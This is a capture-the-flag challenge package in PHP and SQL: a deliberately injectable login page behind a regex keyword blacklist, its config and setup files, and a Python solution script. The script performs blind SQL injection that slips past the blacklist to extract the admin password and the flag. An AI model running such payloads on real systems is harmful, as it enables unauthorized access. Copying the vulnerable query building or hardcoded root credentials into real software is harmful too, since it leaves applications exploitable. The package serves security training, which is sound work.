1. // index.php
    2. <?php 
    3. include "./config.php";
    4. include "./flag.php";
    5. error_reporting(0);
    7. $black_list = "/admin|guest|limit|by|substr|mid|like|or|char|union|select|greatest|%00|\'|";
    8. $black_list .= "=|_| |in|<|>|-|chal|_|\.|\(\)|#|and|if|database|where|concat|insert|having|sleep/i";
    9. if(preg_match($black_list, $_GET['user'])) exit(":P"); 
    10. if(preg_match($black_list, $_GET['pwd'])) exit(":P"); 
    12. $query="select user from users where user='$_GET[user]' and pwd='$_GET[pwd]'";
    13. echo "<h1>query : <strong><b>{$query}</b></strong><br></h1>";
    14. $result = $conn->query($query);
    15. if($result->num_rows > 0){
    16.     $row = $result->fetch_assoc();
    17.     if($row['user']) echo "<h2>Welcome {$row['user']}</h2>";
    18. }
    20. $result = $conn->query("select pwd from users where user='admin'");
    21. if($result->num_rows > 0){
    22.     $row = $result->fetch_assoc();
    23.     $admin_pass = $row['pwd'];
    24. }
    26. if(($admin_pass)&&($admin_pass === $_GET['pwd'])){
    27.     echo $flag;
    28. }
    29. highlight_file(__FILE__);
    30. ?>
    // config.php
<?php  
$servername = "localhost";
$username = "root";
$password = "toor";
$dbname = "day15";
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
    die("连接失败: ");
}
?>

    // flag.php
<?php
$flag = "HRCTF{Sql_and_byPass_WAF!}";
?>

    // 题目环境.sql
DROP DATABASE IF EXISTS day15;
CREATE DATABASE day15;
USE day15;
CREATE TABLE users (
    id int(6) unsigned auto_increment primary key,
    user varchar(20) not null,
    pwd varchar(40) not null
);

INSERT INTO users(user,pwd) VALUES('Lucia','82ebeafb2b5dede380a0d2e1323d6d0b');
INSERT INTO users(user,pwd) VALUES('Admin','c609b5eda02acd7b163f500cb23b06b1');

    Payload

    import string
import requests
import re

char_set = '0123456789abcdefghijklmnopqrstuvwxyz_'
pw = ''
while True:
    for ch in char_set:
        url = 'http://127.0.0.1/day15/index.php?user=\\&pwd=||pwd/**/regexp/**/"^{}";%00'.format(pw+ch)
        # print(url)
        r = requests.get(url=url)
        if "Welcome Admin" in r.text:
            pw += ch
            print(pw)
            break
    if ch == '_':break

r = requests.get('http://localhost/day15/?user=&pwd=%s' % pw)
print(re.findall('HRCTF{\S{1,50}}',r.text)[0])